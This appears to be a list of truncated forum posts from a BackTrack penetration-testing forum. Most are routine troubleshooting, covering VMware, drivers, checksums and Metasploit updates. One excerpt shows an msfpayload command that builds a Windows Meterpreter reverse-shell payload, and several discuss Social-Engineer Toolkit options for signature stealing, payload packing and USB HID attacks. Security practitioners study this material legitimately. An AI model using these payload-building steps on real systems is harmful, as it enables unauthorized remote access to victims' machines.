Don't know if this will help you out or not, but google:
client 99.999.99.99 query (cache) 'www.someserver.com/A/IN' denied: 1 Time(s)
Reading through some of the results will lead you here:
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Don't know if this will help you out or not, but google:
client 99.999.99.99 query (cache) 'www.someserver.com/A/IN' denied: 1 Time(s)
Reading through some of the results will lead you here:
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Good point. Your script looks awesome, by the way. I can't wait to try out the version you're working on here. Thanks!
Would
#!/bin/bash
# Define what we're looking for.
string='backtrack'
# Dump the first nine characters, from the /etc/issue file, into a test file.
cat /etc/issue | cut -c 1-9 > test.txt
...
Hi DGConsultingUK,
Here are my notes for metasm:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 R > testasm
# cd /opt/metasploit/msf3/lib/metasm
# cp -a metasm.rb metasm...
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Today I would like to show you a most simple and awesome way to boot <<Back|Track 5 R1, PXE-style, over the Internet.
Ingredients:
- BT5R1-GNOME-32.iso
- iPXE...
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I know that my posts are always simplistic, almost to the point of perhaps being annoying to the advanced users here. This is not my intention.
It is also not my intention to suggest that anyone...
I don't think the DIGITAL_SIGNATURE_STEAL is an issue per se. If you read the release notes for s.e.t. 1.4, you can see what is being done there.
The thing about set_config is that is allows you...
The errors described within the initial post seem to be taken care of when two directives in set_config read as follows:
DIGITAL_SIGNATURE_STEAL=OFF
...
I think this has something to do with the DIGITAL_SIGNATURE_STEAL=ON directive, in set_config.
The reason I think this, is because, the point when SET reaches this:
Digital Signature Stealing...
Sorry for the self-reply. I tried this out myself, and still getting the, "Something went wrong, printing the error: unpack requires a string argument of length 8".
adjusting the path to upx does...
I did a #grep -R UPX /pentest/exploits/set/
In the results, there's a line in set_config that reads:
UPX_PATH=/pentest/database/sqlmap/lib/contrib/upx/linux/upx
tried to cd to that directory,...
In order to get the S.E.T. - Teensy USB HID Attack Vector running on BT5 KDE 64bit, it is necessary to install two packages:
#apt-get update && apt-get install gcc-avr avr-libc
Once those...
You should check into updating the Metasploit Framework through Subversion. I could be way off, but I think that is the preferred method. Use your Google-fu skills.
Just out of curiosity, are you running your ssh server with password authentication? If so you may want to look into using authentication keys instead.
Sounds like you need to take a trip over to the Wiki. Read that entry, and when you've time, read the whole Wiki. There's a metric ton of good information to be read there. Be good and have fun.
Have you tried VMware Player? I may be wrong, but I think that VMware Server is not going to be updated anymore. I've been using Player for some time now, and it works well. You can open more than...
Have you verified the image's MD5 checksum?
MD5: 95c8b727d01b96b6df84381065cd9da6
In case you've not done this, you may want to look at the following wiki entry
http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=it&u=http%3A%2F%2Fresources.infosecinstitute.com%2Fslaac-attack%2F
E 'questo un articolo che potete...
Don't know if this would be of any help to you or not, but when I was going through the HE.net IPv6 certification, I had to take my WRT54G out of the equation, in order to complete the 6to4 tunnel.
...
The same is possible with Player. You just have to open more than one instance of the program.
Apologies if this is posted in the wrong forum.
After updating my installation of VMware Player to 3.1.3, I no longer had the ability to use Bridged Networking with any of my guests.
After...
Via: dradis - Effective Information Sharing:
- Improved performance across the board
- Upgraded libraries: Rails 3 and ExtJS 3.3
- New First Time User Content showing how to use the interface
...
I'm not sure if they are specific to your issues, but you may want to have a look through these links:
Getting BROADCOM Wireless to work in BackTrack!
BackTrack Wiki - Broadcom wl
I would check the following link first, as a primer for locating and using back doors. Hope this helps:
Doors that could be used for back doors